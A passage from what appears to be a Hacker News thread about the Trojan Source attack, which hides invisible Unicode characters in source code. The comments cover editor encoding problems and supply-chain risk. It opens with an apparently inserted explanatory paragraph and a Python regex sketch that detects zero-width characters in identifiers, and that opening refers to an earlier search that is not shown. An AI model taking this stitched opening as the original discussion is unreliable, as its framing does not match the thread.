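The regex search for zero-width characters inside identifiers mentioned above could look roughly like this. It is a sketch under assumptions: the original search was run over Java code with an unspecified pattern, whereas this version is a generic Python regex, and `tainted_identifiers` is a hypothetical name.

```python
import re

# Zero-width characters that are easy to paste into an identifier unnoticed:
# ZERO WIDTH SPACE, NON-JOINER, JOINER, WORD JOINER and the BOM / ZWNBSP.
# Note: the joiners are legitimate in some scripts, so hits need a human look.
ZERO_WIDTH = "\u200b\u200c\u200d\u2060\ufeff"

# Word characters, then one or more groups of zero-width characters followed
# by more word characters, i.e. a token with something invisible inside it.
PATTERN = re.compile(rf"\w+(?:[{ZERO_WIDTH}]+\w+)+")


def tainted_identifiers(source):
    """Return identifier-like tokens that contain a zero-width character."""
    return [m.group(0) for m in PATTERN.finditer(source)]


if __name__ == "__main__":
    code = "void as\u200bdf() { asdf(); }"
    for token in tainted_identifiers(code):
        # Print with escapes so the hidden character is visible.
        print(token.encode("unicode_escape").decode("ascii"))
```

Counting the hits per release would give the kind of year-over-year trend described in the comment.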
        
           | Groxx wrote:
           | yeah, I've had an identifier or two like that in Ruby in the
           | past :) always worth a few facepalm-riddled lols when sharing
           | the final result with the rest of the team, especially since
           | it often meant they copied the func from Stack Overflow or
           | some equivalent.
           | 
           | Most of what I've encountered though has been due to a _lack_
           | of unicode support, and related growing pains in adopting
           | full UTF-8. E.g. many of the Eclipse issues I saw were due to
           | UTF-16 weirdness and stuff encoded in ShiftJIS or whatever
           | flavor of Windows encoding you used, and all those garbled
           | files due to missing magic-encoding-bytes in files. UTF-8
           | support "completing" in tools largely cleaned all that up,
           | since they detected the encoding, converted to UTF-8, and
           | showed abnormal stuff as the abnormalities they were all
           | along.
           | 
           | I mean, that's probably because taking a deep look at
           | supporting UTF-8 meant taking a deep look at many of their
           | latent text bugs and finally fixing them, but it still
           | happened around the same time, and "X editor now supports
           | UTF-8" also marked a dramatic increase in "... and now shows
           | <nbsp> explicitly!" and similar things.
        
       | alanhaha wrote:
       | Will this also fool a formatter?
       | 
       | Actually, I think the formatting of the example at
       | https://www.trojansource.codes/ is strange enough that I would
       | ask the committer to fix it.
        
       | littlestymaar wrote:
       | Something puzzles me: this kind of trick would definitely break
       | syntax highlighting, wouldn't it?
        
         | [deleted]
        
       | sqs wrote:
       | This issue has been raised before, such as at
       | https://github.com/golang/go/issues/20209 (I was reminded of that
       | by
       | https://twitter.com/peter_szilagyi/status/145515080347229798...).
       | There is some other interesting discussion there.
        
       | dathinab wrote:
       | I would say it's less that they discovered a new vulnerability
       | and more that they put needed focus on a long-known problem.
       | 
       | It's just that many people, while knowing the problem, never
       | considered that it could be used in supply chain attacks.
        
       ___________________________________________________________________
       (page generated 2021-11-01 23:02 UTC)